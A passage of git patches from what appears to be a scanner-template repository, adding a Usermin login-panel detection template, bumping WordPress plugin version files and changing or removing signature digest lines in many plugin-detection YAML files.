a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 20cfe3544d..0ca285d5f6 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220748b39de423fb58a6c1bc5edb40e819acb029b810ebcc63b288da50879add9c702207f806547ca3bcf0583ed0732dadc521457c3182faed317933d11600d3d4b2f0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c10d0bb4b6353d7aa0af266da081c29d6a4f600b7eefdcef0b0059aca611457d02201113b7e5d29594678016f758f8e2f9386647e49b7a7de2a9b61ff31bb5264ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 1f2dfc0df1..bb94ccc9f0 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210085fe56043dd86fa2f4324006375761a4172a6eb64bbcc5bc26554227cdd55d070220249b5dbb870c7a1231f3b25028fa105f02c199464219f6126b15f839833ba4cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100990d566a7968434ccc3839f5d5027777c0ae1698ae78f19f035b033fd5627c1702207069a145d6393ae255c1915f316535c4738913c5717693f5475313876f1b0820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From aacb230e99efab70c72d398a7d118eff60239382 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 17 Oct 2024 18:10:18 +0300 Subject: [PATCH 189/218] add usermin panel --- http/exposed-panels/usermin-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/exposed-panels/usermin-panel.yaml diff --git a/http/exposed-panels/usermin-panel.yaml b/http/exposed-panels/usermin-panel.yaml new file mode 100644 index 0000000000..80c7ac3c5f --- /dev/null +++ b/http/exposed-panels/usermin-panel.yaml @@ -0,0 +1,25 @@ +id: usermin-panel + +info: + name: Usermin Panel - Detect + author: s4e-io + severity: info + description: | + Usermin panel was discovered. + metadata: + verified: true + max-request: 1 + fofa-query: "Login to Usermin" + tags: panel,login,usermin,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "Login to Usermin", "/manifest-usermin.json")' + - 'status_code == 200' + condition: and From c058dce4ea485cc2a49396488a28d0c8afce3872 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 00:22:45 +0000 Subject: [PATCH 190/218] =?UTF-8?q?chore:=20update=20WordPress=20Plugins?= =?UTF-8?q?=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- helpers/wordpress/plugins/hostinger.txt | 2 +- helpers/wordpress/plugins/litespeed-cache.txt | 2 +- helpers/wordpress/plugins/maintenance.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/w3-total-cache.txt | 2 +- helpers/wordpress/plugins/woocommerce-gateway-stripe.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - http/technologies/wordpress/plugins/extendify.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-logging.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 207 files changed, 8 insertions(+), 207 deletions(-) diff --git a/helpers/wordpress/plugins/hostinger.txt b/helpers/wordpress/plugins/hostinger.txt index d003324bf6..513cc0b6cf 100644 --- a/helpers/wordpress/plugins/hostinger.txt +++ b/helpers/wordpress/plugins/hostinger.txt @@ -1 +1 @@ -3.0.12 \ No newline at end of file +3.0.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/litespeed-cache.txt b/helpers/wordpress/plugins/litespeed-cache.txt index 3d5762e858..fa09f584d7 100644 --- a/helpers/wordpress/plugins/litespeed-cache.txt +++ b/helpers/wordpress/plugins/litespeed-cache.txt @@ -1 +1 @@ -6.5.1 \ No newline at end of file +6.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/maintenance.txt b/helpers/wordpress/plugins/maintenance.txt index 07c6b55998..262371bc1b 100644 --- a/helpers/wordpress/plugins/maintenance.txt +++ b/helpers/wordpress/plugins/maintenance.txt @@ -1 +1 @@ -4.13 \ No newline at end of file +4.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index ff3215e2da..141b27e697 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -8.5.6 \ No newline at end of file +8.5.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 3256e59f25..dd29970963 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.58 \ No newline at end of file +4.10.59 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index 5b013b97d6..62ae32d582 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.7.6 \ No newline at end of file +2.7.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt index c0bcaebe8f..cfc27b4fab 100644 --- a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt +++ b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt @@ -1 +1 @@ -8.7.0 \ No newline at end of file +8.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index 41086c4452..2c5cf6e287 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.9.1.3 \ No newline at end of file +1.9.1.4 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index fcbc396fcb..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b73137e614c8c7901773e8cfc8b3bec90a435d6db1f3f9dc3e856b09d33260e0022067b656e6c3d1fba30a90a5fc875b28032cdb20a459c622237017c0dd8aedc5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index c16de09f4f..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202920f42e5a8b013692e1ab627b3ccb335318c0be1b0c6b9c53c7164264b15260022100f1752c5cc698c59a192d92a4dbf54639decf8e753d3fd05ed6b9a78612fb1968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 3a04cd51b6..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057077812779d109a6b4af7932969ca92dd9ccbdf993a902fb97ce088c582307b02207bc0a2eb4a30aa8ed8c1dc73aaf0e5f79d9497c3ffcec48cfb3157c8ee28d4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index dc900c8806..1f02455962 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003e93934b061040bd5f5d763c1f7ea9def4f55570678b070d79e6a4020f63ae5022053385fde51ff600af4a1093e1059892adfeafa4051d9333fe19dd94e8010dcfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 1a26641cb5..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210083a1b9e4ce57d0272a0fdde8cb5f626f9a1f9d775c8348158a5989b8e5be1abd02200b9c76311f1b0237cbc3eae5322a1495cf859d8f34246251090f675d652c488f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 27ef08f1aa..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100866f6a0d6f233a3e1a45bd0626e7d5c44c96256254d1981c1fe82298ea85e58b0220467f07401d5929245db38de832c868c6eb1b1bf7488c346a10f0180256251b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7aa72a1829..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f04dfe94200780295170bef7afe0cffc0143f53ab1c2fcd6bfcc4b4f2f656292022100a1af8f283afd242bb8bfa67f5896f79cc19bf21e2198d8691ca76c45cfd24c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 094ca113b4..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201925eb2f40b6dc970e14278c00a942438e66fc052680bc9d9423982fdca630b9022100c64cfd01ee0cc6eed5d82cbd141c1108e3f00c30d0aa0446c5eab52b7a9756a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index f7864cd714..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015d0761a0c6f5a6fc0687a99e6e9b5cdc47951b078e83632c0f27c4ae7831c0c02204310c16b1eee42d4a48e410bfae7dc377f3b74e74c6e2e5fc17f0ee2c737adb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index c1ce5515c5..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054990e71e29897cba1a16957cc6f1c3ddc8324e376f919aecf0e784790152fa402207e6df7391039154d50b5d39339f4f316edaed3d75b00cc3649fa4b143a852f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 5b800e6369..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c224470b2a2c4b5c8c5ca332b2f3567de2e72c782779062901e011e5b978bd1a022100a098b9dbb189b521c0f263359fc3d7acd6a58015e1af93e2328c59703fe20cf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index e23893f1a4..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f3603cfb6a495c693f5a4fb8d73f5ac3e91754d81bb2ac3f24ffafd20f35d3402207767dc9c7142bf8a789d3e1ec8827aafda8e0799de9b77a9f24fcba767215a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 91abc5af65..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004645c4e6bc8559ff4ca457e7ec7795e4f4e6120ee183103ba89cee3401acc2902200b87fb618ac12d180bb038c2b1dbf047778d1f62495bbf92784b4f748aab2f25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index ba8c4c6e9e..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203abd3a60c262143b6acefe64d8b8f2a754fa6a3dfb3560f8ae321b6faf9f595302201cd2b820d57d84a150cd27a96f4f55f2d1385af3a2571e65cd9527e431994301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index ba181e4874..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b39a8ca2d1f5b798383f93e95989404aaf82720378e46dab6a15325179faeba022100e48a75cf2824a104f243a336e2e2ac0600ac48c813f875ac52907431718cb47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index f609ffc2a0..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e2683b59850fb0599bdefc203685fd65663183cd93b44802fda888cecd003f0022008cba99806344a29372d3f8e9f456aba4d0f4e853f2b33aa91ff4615cfa759d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 620c920550..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000a80771d652297bbb36ba952f2ab4179f2bf16103073ba38a91203cb12ce50e02204cf4c80bf42a68733cbee9a0b43467059eebafa454cd55b1c6a150abe7c9fa7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 266fb74e27..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 